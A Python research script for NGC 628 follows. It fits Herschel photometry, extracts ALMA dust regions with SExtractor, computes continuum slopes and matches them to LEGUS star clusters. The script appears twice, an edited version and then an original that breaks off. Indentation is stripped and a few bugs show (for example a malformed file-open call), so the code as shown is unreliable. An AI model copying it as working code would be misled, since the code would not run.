data8 --> sextractor 2pix > 3 sigma
data_oct23 --> using band4.ilsang.pbcor.fits & band7.ilsang.pbcor.fits | sextractor with 5 pixels > 2 sigma
data_oct23_2 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 2 sigma
data_oct23_3 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 3 sigma
data_nov13 --> redo data_oct23 but with much closer overlapping criteria
data_jan31 --> double check if fluxes are being correctly calculated from sextractor
50 contiguous pixels > 2 sigma (50 pixels ~ 1/5 beam size)
data_feb5 --> same as before just now outputs the source fluxes [W/m2] in a separate file
data_feb7 --> last one
data_feb8 --> nevermind this is the last one since overlapping_regions was set to 2.2 arcsec for the separation
but want to have just 1.1 arcsec (beam size)
data_feb12 --> just kidding, this is the last one. fixed beam sizes in fluxes section
"""
# decide what you want: each flag toggles one stage of the pipeline below
global_phot = True # perform global photometry?
regions = True # use sextractor to get dust regions and whatnot?
fluxes = True # calculate flux in dust regions and get slopes?
create_legus_region_files = False # create ds9 region files from legus cluster catalog? (probably not necessary since those files are already on the github repo)
closest_clusters = True # find closest stellar clusters to dust regions?
plot = True # do some plotting?
backup = True # backup files
# directory name this run's results are archived to (see data log in the
# module docstring above)
backup_dir = 'data_feb12'
main_dir = '/uwpa2/turner/legus-alma/'
# all later relative paths assume we are sitting in <main_dir>/science
os.chdir(main_dir + 'science')
# define the band 4 and band 7 fits files to use
b4_fits = 'band4.ilsang.pbcor.fits'
b7_fits = 'band7.ilsang.pbcor.fits'
# define the other fits files needed (primary-beam coverage maps)
b4_pbcoverage = 'band4.ilsang.pb.fits'
b7_pbcoverage = 'band7.ilsang.pb.fits'
# defining some functions
def slope(x,y):
    """Slope of the straight line joining two points in log-log space.

    *x* and *y* are two-element sequences holding the abscissae and
    ordinates of the two points (all positive).
    """
    rise = np.log10(y[1]) - np.log10(y[0])
    run = np.log10(x[1]) - np.log10(x[0])
    return rise / run
def mbb_func_freq(freq, beta, T, sr_in_images):
    """Modified blackbody as a function of frequency.

    Evaluates nu*F_nu for a blackbody with emissivity index *beta* and
    temperature *T* [K], scaled by the solid angle *sr_in_images* [sr].
    *freq* is in Hz; uses astropy SI constants (h, c, k_B) via `const`.
    """
    prefactor = 2 * const.h.value / const.c.value**2
    exponent = const.h.value / const.k_B.value * freq / T
    planck = prefactor * (freq**(3 + beta)) / (np.exp(exponent) - 1)
    return planck * freq * sr_in_images
# global photometry modified blackbody fit
if global_phot:
from modBBfit import fit
print('\ndoing global photometry bidness \n')
os.chdir(main_dir + 'science/herschel/')
# first need pixel scale of the PACS and SPIRE images. units are MJy*pix/sr. we want Jy
head = fits.open('NGC0628_S500_110_SSS_111_PACSS_70.fits')[0].header
cd11 = head['CD1_1'] # deg/pix
cd22 = head['CD2_2'] # deg/pix
pix_scale_sr = (-cd11 * 3600)*(cd22*3600) / 4.255e10 # sr/pix
# read in phot data from tables.asc
net, num_of_pix = np.loadtxt('tables.asc', usecols=[1,2], unpack=True)
# total number of sr in the images
sr_in_images = pix_scale_sr * num_of_pix[0]
# wavelengths of the hershcel images
wavel = np.array([71.8, 103.0, 157.0, 252.0, 353.0, 511.0])*1.0e-6 # meters
# convert to frequencies
freq = const.c.value/wavel # Hz
# now convert flux from MJy*pix/sr to Jy
net = net * pix_scale_sr * 1e6
flux = net * freq # nu*F_nu
# calculate error in fluxes
sky_sigma, n_sky = np.loadtxt('sky.sigma.temp.dat', usecols=[2,3], unpack=True)
flux_err = sky_sigma * np.sqrt(num_of_pix + num_of_pix**2/n_sky)
cal_err = np.array([.05, .05, .05, .07, .07, .07])*flux
flux_err = flux_err * pix_scale_sr * freq * 1e6
flux_err = np.sqrt(flux_err**2 + cal_err**2)*1e-26
beta, T = fit(freq, flux, flux_err, sr_in_images)
# array of wavelengths for fitting
wfit = np.arange(50, 1e4, 10)
# free-free and synchrotron
ff_flux0 = 12.319e-19
sync_flux0 = 4.567e-19
# alma freq
alma_freq = np.array([1.45E+11, 3.43E+11])
alma_wavel = const.c.value/alma_freq[0] * 1e6
bb = mbb_func_freq(const.c.value/(wfit*1e-6), beta[0], T[0], sr_in_images)*1e-26
ff = ff_flux0 * (alma_wavel/wfit)**.9
sync = sync_flux0 * (alma_wavel/wfit)**.2
flux_sum = bb + ff + sync
# alma global phot
anet, anum_of_pix = np.loadtxt(main_dir+'/science/global/tables.4.asc', usecols=[1,2], unpack=True)
# net is in units Jy*pix/beam
b4_hdulist = fits.open(main_dir+ 'science/'+b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_bmaj = b4_header['bmaj'] * 3600.0
b4_bmin = b4_header['bmin'] * 3600.0
b7_hdulist = fits.open(main_dir+'science/'+b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_bmaj = b7_header['bmaj'] * 3600.0
b7_bmin = b7_header['bmin'] * 3600.0
beams = np.array([ np.pi/4.0 *b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
alma_flux = anet / pix_per_beam # Jy
print('\nband7 flux = %1.5f Jy\n'%alma_flux[1])
print('\nband4 flux = %1.5f Jy\n'%alma_flux[0])
# save alma data
np.savetxt(main_dir+'science/global/alma_global_flux.dat',np.transpose([const.c.value/alma_freq * 1e6, alma_flux*alma_freq*1e-26]), header='wavelength (micron) \t flux (W/m2)' )
# save herschel data
np.savetxt('herschel_flux.dat', np.transpose([const.c.value/freq * 1e6, flux*1e-26, flux_err]), header='wavelength (micron) \t flux (W/m2) \t 1 sigma error')
# save bb, ff, and sync data
np.savetxt('radiation.dat', np.transpose([wfit, bb, ff, sync, flux_sum]), header='wavelength (micron) \t BB (W/m2) \t F-F flux (W/m2) \t Synchrotron (W/m2) \t BB+FF+Sync (W/m2)')
np.savetxt('bb_params.dat', [beta, T], header='best fit parameters for the modified blackbody fit \nbeta, +error, -error \ntemperature, +error, -error')
# for testing how things look:
# read in data from the things above
wavel, bb, ff, sync, total = np.loadtxt(main_dir+'science/herschel/radiation.dat', unpack=True)
hwavel, hflux, herr = np.loadtxt(main_dir+'science/herschel/herschel_flux.dat', unpack=True)
awavel, aflux = np.loadtxt(main_dir + 'science/global/alma_global_flux.dat', unpack=True)
plt.figure()
plt.loglog(hwavel, hflux, 'ko')
plt.loglog(awavel, aflux, 'ro')
plt.loglog(wavel, total, 'k-')
plt.xlabel('Wavelength (micron)')
plt.ylabel(r'Flux (W/m$^2$)')
plt.show()
if regions:
print('\ndoing dust region bidness \n')
os.chdir(main_dir + 'science/')
# read in band 4 header and data
b4_hdulist = fits.open(b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_data = b4_hdu.data
b4_bmaj = b4_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b4_bmin = b4_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# read in band 7 header and data
b7_hdulist = fits.open(b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_data = b7_hdu.data
b7_bmaj = b7_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b7_bmin = b7_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# use sextractor to extract the dust regions
# need to run sextractor from physics network computer like uwpa
b4_sexcmd = 'sex ../%s -c config.sex -catalog_name band4.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b4_fits, b4_bmaj)
b7_sexcmd = 'sex ../%s -c config.sex -catalog_name band7.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b7_fits, b7_bmaj)
# need to run sextractor from extract directory with the config files and default params things
os.chdir(main_dir+'science/extract')
# run sextractor commands
try:
subprocess.call(b4_sexcmd.split())
subprocess.call(b7_sexcmd.split())
except OSError as e:
print(e)
# make new .cats that only have regions that lie within the 80% pbcoverage
in_footprint('band4.cat', '../'+b4_pbcoverage)
in_footprint('band7.cat', '../'+b7_pbcoverage)
# next step is to make ds9 regions out of the sextractor .cat
get_regions('band4.in_footprint.cat')
get_regions('band7.in_footprint.cat')
# outputs band4.in_footprint.reg and band7.in_footprint.reg
done = False
while not done:
check = input('Did you open the in_footprint.reg files and then save them as degree region files? [y/n] ')
if check == 'y'or check == 'yes' or check == 'Y' or check == 'Yes' or check == 'YES' or check == 'yeet' or check == 'YEET':
# need to open band4.in_footprint.reg and band7.in_footprint.reg in ds9 and save as degree region files
overlap('band4.in_footprint.deg.reg', 'band7.in_footprint.deg.reg', sep=1.1)
# outputs band4.overlap.deg.reg and band7.overlap.deg.reg
done = True
else:
print('\nwell do it\n')
if fluxes:
print('\ndoing flux continuum slope bidness \n')
os.chdir(main_dir + 'science/extract')
# grab fluxes in regions
# need the band frequencies
# band 4, band 7
freq = np.array([1.45E+11, 3.43E+11])
wavel = const.c.value/freq
b4_flux, b4_fluxerr, b4_bg = np.loadtxt('band4.overlap.cat', usecols=[0,1,3], unpack=True)
b7_flux, b7_fluxerr, b7_bg = np.loadtxt('band7.overlap.cat', usecols=[0,1,3], unpack=True)
os.chdir(main_dir + 'science/')
# these are the wrong beam sizes (< 0.2% difference)
# b4_bmaj = 1.12562286853788
# b4_bmin = 1.07750606536872
# b7_bmaj = 1.11270332336436
# b7_bmin = 1.04236483573908
# flux from sextractor is in Jy pix/beam so need to get rid of beam business
beams = np.array([ np.pi/4.0 * b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
# Jy
flux = np.array([ b4_flux/pix_per_beam[0], b7_flux/pix_per_beam[1] ])
flux_err = np.array([ b4_fluxerr/pix_per_beam[0], b7_fluxerr/pix_per_beam[1] ])
# Jy to W/m2
fWm2 = np.array([ flux[0] * 1e-26 * freq[0], flux[1] * 1e-26 * freq[1] ])
efWm2 = np.array([ flux_err[0] * 1e-26 * freq[0], flux_err[1] * 1e-26 * freq[1]])
# output
f = open('source_fluxes.dat', 'w')
f.write(f'{'# F(0.87mm) W/m2':>16}')
f.write(' ')
f.write(f'{'Error':>11}')
f.write(' ')
f.write(f'{'F(2.1mm) W/m2':>13}')
f.write(' ')
f.write(f'{'Error':>11}')
f.write('\n')
for i in range(len(fWm2[0])):
f.write(f'{'%1.5e'%fWm2[1][i]:>16}')
f.write(' ')
f.write(f'{'%1.5e'%efWm2[1][i]:>11}')
f.write(' ')
f.write(f'{'%1.5e'%fWm2[0][i]:>13}')
f.write(' ')
f.write(f'{'%1.5e'%efWm2[0][i]:>11}')
f.write('\n')
f.close()
# simple calculation of slopes
slopes = slope(freq, flux)
# mcmc calculation of slopes and the standard deviations on those slopes
err_params = np.zeros([len(flux[0]), 3])
for i in range(len(flux[0])):
y = np.array([flux[0][i], flux[1][i]])*1e-26
err = np.array([flux_err[0][i], flux_err[1][i]])*1e-26
err_params[i] = mcmc_error(slope, wavel, y, err)
np.savetxt('slopes+errs.dat', err_params, header='mean slope \t std dev \t median slope')
if create_legus_region_files:
print('\nturning legus clusters into ds9 region files \n')
os.chdir(main_dir + 'science/legus')
ra, dec, cl = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab', usecols=[3,4,33], unpack=True)
all_clusters = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab')
# first get rid of classes 0 and 4
w = np.where((cl != 0) & (cl != 4))[0]
ra = ra[w]
dec = dec[w]
all_clusters = all_clusters[w]
# output these star clusters as a ds9 degree region file
f = open('ngc628-c_clusters_class123.deg.reg w')
f.write('fk5\n')
for i in range(len(ra)):
f.write('point(%1.6f,%1.6f) # point=X\n'%(ra[i], dec[i]))
f.close()
# write out new cluster catalog file with just classes 1,2,3
np.savetxt('ngc628-c_clusters_class123.cat', all_clusters, delimiter='\t')
if closest_clusters:
print('\nfinding the closest stellar clusters to the dust blobs \n')
os.chdir(main_dir + 'science')
dustcoords, starcoords, age, mass, excess = nearest_cluster('extract/band4.overlap.deg.reg')
# calculate angular separations
ang_sep = np.array([ dustcoords[i].separation(starcoords[i]).arcsec for i in range(len(dustcoords))])
# calculate physical separations in pc
phys_sep = np.array([ ang*10e6 / 206265 for ang in ang_sep ])
age_avg = np.array([ np.mean(a) for a in age ])
mass_avg = np.array([ np.mean(m) for m in mass ])
excess_avg = np.array([ np.mean(e) for e in excess])
phys_sep_avg = np.array([ np.mean(p) for p in phys_sep ])
ang_sep_avg = np.array([ np.mean(a) for a in ang_sep])
age_min = np.array([ np.min(a) for a in age ])
mass_min = np.array([ np.min(m) for m in mass ])
excess_min = np.array([ np.min(e) for e in excess ])
phys_sep_min = np.array([ np.min(p) for p in phys_sep])
ang_sep_min = np.array([ np.min(a) for a in ang_sep])
np.savetxt('closest_clusters_props.average.dat', np.transpose([ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
np.savetxt('closest_clusters_props.minimum.dat', np.transpose([ang_sep_min, phys_sep_min, age_min, mass_min, excess_min]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
if plot:
print('\ndoing some plotting bidness \n')
ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg = np.loadtxt('closest_clusters_props.average.dat', unpack=True)
ang_sep_min, phys_sep_min, age_min, mass_min, excess_min = np.loadtxt('closest_clusters_props.minimum.dat', unpack=True)
slopes = np.loadtxt('slopes+errs.dat', usecols=[0])
plt.figure()
plt.semilogx(age_avg, slopes, 'ro')
# plt.loglog(age_avg, np.abs(slopes), 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_avg.png')
# plt.show()
plt.figure()
plt.semilogx(age_min, slopes, 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/age_min.png')
# plt.show()
plt.figure()
plt.semilogx(mass_avg, slopes, 'ro')
# plt.loglog(mass_avg, -slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/mass_avg.png')
# plt.show()
plt.figure()
plt.semilogx(mass_min, slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/mass_min.png')
# plt.show()
plt.figure()
plt.semilogx(excess_avg, slopes, 'ro')
# plt.loglog(excess_avg, -slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/excess_avg.png')
# plt.show()
plt.figure()
plt.semilogx(excess_min, slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/excess_min.png')
# plt.show()
plt.figure()
plt.semilogy(phys_sep_avg, age_avg, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_sep_avg.png')
plt.figure()
plt.semilogy(phys_sep_min, age_min, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('closest cluster')
plt.savefig('figs/age_sep_min.png')
plt.figure()
plt.semilogx(phys_sep_min, slopes, 'ro')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/slope_vs_sep.png')
if backup:
os.chdir(main_dir + 'science')
# save relevant files in new directory
extract_files = 'cp extract/band4.cat extract/band4.in_footprint.cat extract/band4.in_footprint.deg.reg extract/band4.overlap.cat extract/band4.overlap.deg.reg extract/band7.cat extract/band7.in_footprint.cat extract/band7.in_footprint.deg.reg extract/band7.overlap.cat extract/band7.overlap.deg.reg '+backup_dir
herschel_files = 'cp herschel/bb_params.dat herschel/herschel_flux.dat herschel/radiation.dat herschel/sky.sigma.temp.dat '+backup_dir # also tables.asc renamed to tables.herschel.asc
global_files = 'cp global/alma_global_flux.dat '+backup_dir # also tables.asc renamed to tables.alma.asc
files = 'cp slopes+errs.dat all_clusters.dat closest_clusters_props.average.dat closest_clusters_props.minimum.dat source_fluxes.dat '+backup_dir #also figs directory copied
try:
subprocess.call(['mkdir', '-p', backup_dir])
except:
print('failed to make backup directory')
try:
subprocess.call(extract_files.split())
except:
print('failed to copy extract directory files')
try:
subprocess.call(herschel_files.split())
except:
print('failed to copy herschel directory files')
try:
subprocess.call(['cp', 'herschel/tables.asc', backup_dir+'/tables.herschel.asc'])
except:
print('failed to copy herschel tables')
try:
subprocess.call(global_files.split())
except:
print('failed to copy global flux files')
try:
subprocess.call(['cp', 'global/tables.4.asc', backup_dir+'/tables.alma.asc'])
except:
print('failed to global tables')
try:
subprocess.call(files.split())
except:
print('failed to copy main directory files')
try:
subprocess.call(['cp', '-r', 'figs', backup_dir+'/'])
except:
print('failed to copy the figs directory')
| #!/d/users/turner/tools/anaconda3/bin/python
"""
big 'ole python script that (hopefully) goes through the entire science procedure for give band 4 and band 7 fits files
notes are given in science.md
**python3**
to run:
ipython
exec(open('science.py').read())
"""
import numpy as np
import matplotlib.pyplot as plt
import astropy
from astropy.io import fits
import os, sys, subprocess
from astropy import constants as const
# add scripts directory to the path
sys.path.insert(0, '/uwpa2/turner/legus-alma/scripts/')
from ds9_regions_from_sextractor import get_regions
from get_sextractor_in_footprint import in_footprint
from overlapping_regions import overlap
from mcmc_error_bars import mcmc_error
from nearest_cluster import nearest_cluster
"""
if starting with new band 4 and band 7 fits files, you need to:
1. make sure to have pbcoverage files
2. take global.deg.reg and make new pixel files for band 4 and band 7
data1 --> results for sextractor with 5 pixels > 2 sigma
data2 --> results for sextractor with 5 pixels > 2.5 sigma
data3 --> results for sextractor with 5 pixels > 3.0 sigma
data4 --> retry sextractor 5pix > 2 sigma
data5 --> retry sextractor 5pix > 2.5 sigma
data6 --> retry sextractor 5pix > 3.0 sigma
data7 --> sextractor 2pix > 2 sigma
data8 --> sextractor 2pix > 3 sigma
data_oct23 --> using band4.ilsang.pbcor.fits & band7.ilsang.pbcor.fits | sextractor with 5 pixels > 2 sigma
data_oct23_2 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 2 sigma
data_oct23_3 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 3 sigma
data_nov13 --> redo data_oct23 but with much closer overlapping criteria
data_jan31 --> double check if fluxes are being correctly calculated from sextractor
50 contigous pixels > 2 sigma (50 pixels ~ 1/5 beam size)
data_feb5 --> same as before just now outputs the source fluxes [W/m2] in a seperate file
data_feb7 --> last one
data_feb8 --> nevermind this is the last one since overlapping_regions was set to 2.2 arcsec for the separation
but want to have just 1.1 arcsec (beam size)
data_feb12 --> just kidding, this is the last one. fixed beam sizes in fluxes section
"""
# decide what you want:
global_phot = True # perform global photometry?
regions = True # use sextractor to get dust regions and whatnot?
fluxes = True # calculate flux in dust regions and get slopes?
create_legus_region_files = False # create ds9 region files from legus cluster catalog? (probably not necessary since those files are already on the github repo)
closest_clusters = True # find closest stellar clusters to dust regions?
plot = True # do some plotting?
backup = True # backup files
backup_dir = 'data_feb12'
main_dir = '/uwpa2/turner/legus-alma/'
os.chdir(main_dir + 'science')
# define the band 4 and band 7 fits files to use
b4_fits = 'band4.ilsang.pbcor.fits'
b7_fits = 'band7.ilsang.pbcor.fits'
# define the other fits files needed
b4_pbcoverage = 'band4.ilsang.pb.fits'
b7_pbcoverage = 'band7.ilsang.pb.fits'
# defining some functions
def slope(x,y):
"""simple function to return the slope of a log line connecting two points
"""
return (np.log10(y[1]) - np.log10(y[0])) / (np.log10(x[1]) - np.log10(x[0]))
def mbb_func_freq(freq, beta, T, sr_in_images):
C3 = 2 * const.h.value / const.c.value**2
C4 = const.h.value / const.k_B.value
bb = C3 * (freq**(3 + beta)) / (np.exp(C4*freq/T) - 1)
return bb * freq * sr_in_images
# global photometry modified blackbody fit
if global_phot:
from modBBfit import fit
print('\ndoing global photometry bidness \n')
os.chdir(main_dir + 'science/herschel/')
# first need pixel scale of the PACS and SPIRE images. units are MJy*pix/sr. we want Jy
head = fits.open('NGC0628_S500_110_SSS_111_PACSS_70.fits')[0].header
cd11 = head['CD1_1'] # deg/pix
cd22 = head['CD2_2'] # deg/pix
pix_scale_sr = (-cd11 * 3600)*(cd22*3600) / 4.255e10 # sr/pix
# read in phot data from tables.asc
net, num_of_pix = np.loadtxt('tables.asc', usecols=[1,2], unpack=True)
# total number of sr in the images
sr_in_images = pix_scale_sr * num_of_pix[0]
# wavelengths of the hershcel images
wavel = np.array([71.8, 103.0, 157.0, 252.0, 353.0, 511.0])*1.0e-6 # meters
# convert to frequencies
freq = const.c.value/wavel # Hz
# now convert flux from MJy*pix/sr to Jy
net = net * pix_scale_sr * 1e6
flux = net * freq # nu*F_nu
# calculate error in fluxes
sky_sigma, n_sky = np.loadtxt('sky.sigma.temp.dat', usecols=[2,3], unpack=True)
flux_err = sky_sigma * np.sqrt(num_of_pix + num_of_pix**2/n_sky)
cal_err = np.array([.05, .05, .05, .07, .07, .07])*flux
flux_err = flux_err * pix_scale_sr * freq * 1e6
flux_err = np.sqrt(flux_err**2 + cal_err**2)*1e-26
beta, T = fit(freq, flux, flux_err, sr_in_images)
# array of wavelengths for fitting
wfit = np.arange(50, 1e4, 10)
# free-free and synchrotron
ff_flux0 = 12.319e-19
sync_flux0 = 4.567e-19
# alma freq
alma_freq = np.array([1.45E+11, 3.43E+11])
alma_wavel = const.c.value/alma_freq[0] * 1e6
bb = mbb_func_freq(const.c.value/(wfit*1e-6), beta[0], T[0], sr_in_images)*1e-26
ff = ff_flux0 * (alma_wavel/wfit)**.9
sync = sync_flux0 * (alma_wavel/wfit)**.2
flux_sum = bb + ff + sync
# alma global phot
anet, anum_of_pix = np.loadtxt(main_dir+'/science/global/tables.4.asc', usecols=[1,2], unpack=True)
# net is in units Jy*pix/beam
b4_hdulist = fits.open(main_dir+ 'science/'+b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_bmaj = b4_header['bmaj'] * 3600.0
b4_bmin = b4_header['bmin'] * 3600.0
b7_hdulist = fits.open(main_dir+'science/'+b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_bmaj = b7_header['bmaj'] * 3600.0
b7_bmin = b7_header['bmin'] * 3600.0
beams = np.array([ np.pi/4.0 *b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
alma_flux = anet / pix_per_beam # Jy
print('\nband7 flux = %1.5f Jy\n'%alma_flux[1])
print('\nband4 flux = %1.5f Jy\n'%alma_flux[0])
# save alma data
np.savetxt(main_dir+'science/global/alma_global_flux.dat',np.transpose([const.c.value/alma_freq * 1e6, alma_flux*alma_freq*1e-26]), header='wavelength (micron) \t flux (W/m2)' )
# save herschel data
np.savetxt('herschel_flux.dat', np.transpose([const.c.value/freq * 1e6, flux*1e-26, flux_err]), header='wavelength (micron) \t flux (W/m2) \t 1 sigma error')
# save bb, ff, and sync data
np.savetxt('radiation.dat', np.transpose([wfit, bb, ff, sync, flux_sum]), header='wavelength (micron) \t BB (W/m2) \t F-F flux (W/m2) \t Synchrotron (W/m2) \t BB+FF+Sync (W/m2)')
np.savetxt('bb_params.dat', [beta, T], header='best fit parameters for the modified blackbody fit \nbeta, +error, -error \ntemperature, +error, -error')
# for testing how things look:
# read in data from the things above
wavel, bb, ff, sync, total = np.loadtxt(main_dir+'science/herschel/radiation.dat', unpack=True)
hwavel, hflux, herr = np.loadtxt(main_dir+'science/herschel/herschel_flux.dat', unpack=True)
awavel, aflux = np.loadtxt(main_dir + 'science/global/alma_global_flux.dat', unpack=True)
plt.figure()
plt.loglog(hwavel, hflux, 'ko')
plt.loglog(awavel, aflux, 'ro')
plt.loglog(wavel, total, 'k-')
plt.xlabel('Wavelength (micron)')
plt.ylabel(r'Flux (W/m$^2$)')
plt.show()
if regions:
print('\ndoing dust region bidness \n')
os.chdir(main_dir + 'science/')
# read in band 4 header and data
b4_hdulist = fits.open(b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_data = b4_hdu.data
b4_bmaj = b4_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b4_bmin = b4_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# read in band 7 header and data
b7_hdulist = fits.open(b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_data = b7_hdu.data
b7_bmaj = b7_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b7_bmin = b7_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# use sextractor to extract the dust regions
# need to run sextractor from physics network computer like uwpa
b4_sexcmd = 'sex ../%s -c config.sex -catalog_name band4.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b4_fits, b4_bmaj)
b7_sexcmd = 'sex ../%s -c config.sex -catalog_name band7.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b7_fits, b7_bmaj)
# need to run sextractor from extract directory with the config files and default params things
os.chdir(main_dir+'science/extract')
# run sextractor commands
try:
subprocess.call(b4_sexcmd.split())
subprocess.call(b7_sexcmd.split())
except OSError as e:
print(e)
# make new .cats that only have regions that lie within the 80% pbcoverage
in_footprint('band4.cat', '../'+b4_pbcoverage)
in_footprint('band7.cat', '../'+b7_pbcoverage)
# next step is to make ds9 regions out of the sextractor .cat
get_regions('band4.in_footprint.cat')
get_regions('band7.in_footprint.cat')
# outputs band4.in_footprint.reg and band7.in_footprint.reg
done = False
while not done:
check = input('Did you open the in_footprint.reg files and then save them as degree region files? [y/n] ')
if check == 'y'or check == 'yes' or check == 'Y' or check == 'Yes' or check == 'YES' or check == 'yeet' or check == 'YEET':
# need to open band4.in_footprint.reg and band7.in_footprint.reg in ds9 and save as degree region files
overlap('band4.in_footprint.deg.reg', 'band7.in_footprint.deg.reg', sep=1.1)
# outputs band4.overlap.deg.reg and band7.overlap.deg.reg
done = True
else:
print('\nwell do it\n')
if fluxes:
print('\ndoing flux continuum slope bidness \n')
os.chdir(main_dir + 'science/extract')
# grab fluxes in regions
# need the band frequencies
# band 4, band 7
freq = np.array([1.45E+11, 3.43E+11])
wavel = const.c.value/freq
b4_flux, b4_fluxerr, b4_bg = np.loadtxt('band4.overlap.cat', usecols=[0,1,3], unpack=True)
b7_flux, b7_fluxerr, b7_bg = np.loadtxt('band7.overlap.cat', usecols=[0,1,3], unpack=True)
os.chdir(main_dir + 'science/')
# these are the wrong beam sizes (< 0.2% difference)
# b4_bmaj = 1.12562286853788
# b4_bmin = 1.07750606536872
# b7_bmaj = 1.11270332336436
# b7_bmin = 1.04236483573908
# flux from sextractor is in Jy pix/beam so need to get rid of beam business
beams = np.array([ np.pi/4.0 * b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
# Jy
flux = np.array([ b4_flux/pix_per_beam[0], b7_flux/pix_per_beam[1] ])
flux_err = np.array([ b4_fluxerr/pix_per_beam[0], b7_fluxerr/pix_per_beam[1] ])
# Jy to W/m2
fWm2 = np.array([ flux[0] * 1e-26 * freq[0], flux[1] * 1e-26 * freq[1] ])
efWm2 = np.array([ flux_err[0] * 1e-26 * freq[0], flux_err[1] * 1e-26 * freq[1]])
# output
f = open('source_fluxes.dat', 'w')
f.write(f'{"# F(0.87mm) W/m2":>16}')
f.write(' ')
f.write(f'{"Error":>11}')
f.write(' ')
f.write(f'{"F(2.1mm) W/m2":>13}')
f.write(' ')
f.write(f'{"Error":>11}')
f.write('\n')
for i in range(len(fWm2[0])):
f.write(f'{"%1.5e"%fWm2[1][i]:>16}')
f.write(' ')
f.write(f'{"%1.5e"%efWm2[1][i]:>11}')
f.write(' ')
f.write(f'{"%1.5e"%fWm2[0][i]:>13}')
f.write(' ')
f.write(f'{"%1.5e"%efWm2[0][i]:>11}')
f.write('\n')
f.close()
# simple calculation of slopes
slopes = slope(freq, flux)
# mcmc calculation of slopes and the standard deviations on those slopes
err_params = np.zeros([len(flux[0]), 3])
for i in range(len(flux[0])):
y = np.array([flux[0][i], flux[1][i]])*1e-26
err = np.array([flux_err[0][i], flux_err[1][i]])*1e-26
err_params[i] = mcmc_error(slope, wavel, y, err)
np.savetxt('slopes+errs.dat', err_params, header='mean slope \t std dev \t median slope')
if create_legus_region_files:
print('\nturning legus clusters into ds9 region files \n')
os.chdir(main_dir + 'science/legus')
ra, dec, cl = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab', usecols=[3,4,33], unpack=True)
all_clusters = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab')
# first get rid of classes 0 and 4
w = np.where((cl != 0) & (cl != 4))[0]
ra = ra[w]
dec = dec[w]
all_clusters = all_clusters[w]
# output these star clusters as a ds9 degree region file
f = open('ngc628-c_clusters_class123.deg.reg w')
f.write('fk5\n')
